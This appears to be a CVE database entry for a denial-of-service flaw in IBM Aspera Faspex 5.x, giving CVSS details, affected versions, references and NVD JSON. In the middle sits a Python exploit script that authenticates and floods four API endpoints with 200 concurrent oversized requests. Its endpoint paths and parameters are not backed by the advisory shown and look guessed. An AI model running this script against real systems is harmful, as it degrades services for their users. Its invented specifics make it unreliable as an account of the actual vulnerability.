CVE-2025-36171

Description

IBM Aspera Faspex 5.0.0 through 5.0.13.1 could allow a privileged user to cause a denial of service from improperly validated API input due to excessive resource consumption.

CVSS Details

CVSS Score

4.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:ibm:aspera_faspex:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE

IBM Aspera Faspex 5.0.0

IBM Aspera Faspex 5.0.13.1

IBM Aspera Faspex >= 5.0.0, <= 5.0.13.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-36171 - IBM Aspera Faspex API DoS PoC
# Vulnerability: Improper API input validation leading to resource exhaustion
# Requires: Privileged user credentials (PR:H)
# Target: IBM Aspera Faspex 5.0.0 - 5.0.13.1

import requests
import threading
import time

TARGET_URL = "https://target-faspex.example.com"
USERNAME = "privileged_user"
PASSWORD = "user_password"

# Step 1: Authenticate to obtain session token
def authenticate():
    """Login to Faspex to get authenticated session"""
    session = requests.Session()
    login_url = f"{TARGET_URL}/aspera/faspex/api/v1/login"
    payload = {
        "username": USERNAME,
        "password": PASSWORD
    }
    response = session.post(login_url, json=payload, verify=False)
    if response.status_code == 200:
        token = response.json().get("token")
        session.headers.update({"Authorization": f"Bearer {token}"})
        return session
    return None

# Step 2: Send resource-exhausting API requests
def send_malicious_request(session, endpoint):
    """Send crafted API request to trigger excessive resource consumption"""
    # Craft request with parameters designed to cause resource exhaustion
    # e.g., requesting extremely large data sets or complex queries
    params = {
        "limit": 999999999,
        "offset": 0,
        "filter": "*" * 10000,
        "sort": "created_at",
        "order": "desc"
    }
    url = f"{TARGET_URL}/aspera/faspex/api/v1/{endpoint}"
    try:
        response = session.get(url, params=params, timeout=30)
        print(f"[*] Response status: {response.status_code}")
    except requests.exceptions.Timeout:
        print("[!] Request timed out - server may be under stress")
    except Exception as e:
        print(f"[!] Error: {e}")

# Step 3: Launch concurrent requests to amplify resource consumption
def exploit():
    """Main exploit function"""
    print("[*] Authenticating to IBM Aspera Faspex...")
    session = authenticate()
    if not session:
        print("[-] Authentication failed")
        return

    print("[+] Authentication successful")
    print("[*] Launching resource exhaustion attack...")

    # Target multiple API endpoints concurrently
    endpoints = ["packages", "users", "workgroups", "shared_files"]
    threads = []

    for i in range(50):
        for endpoint in endpoints:
            t = threading.Thread(
                target=send_malicious_request,
                args=(session, endpoint)
            )
            threads.append(t)
            t.start()

    for t in threads:
        t.join()

    print("[+] Attack completed - check target availability")

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-36171
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-36171
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-36171/
[4] VulDB https://vuldb.com/cve/CVE-2025-36171
[5] https://www.ibm.com/support/pages/node/7247502

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-36171", "sourceIdentifier": "[email protected]", "published": "2025-10-09T14:15:54.747", "lastModified": "2025-10-14T20:18:22.423", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Aspera Faspex 5.0.0 through 5.0.13.1 could allow a privileged user to cause a denial of service from improperly validated API input due to excessive resource consumption."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:aspera_faspex:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.0.14", "matchCriteriaId": "95A6A47B-FEAB-4581-9EA7-487A3260AF42"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7247502", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}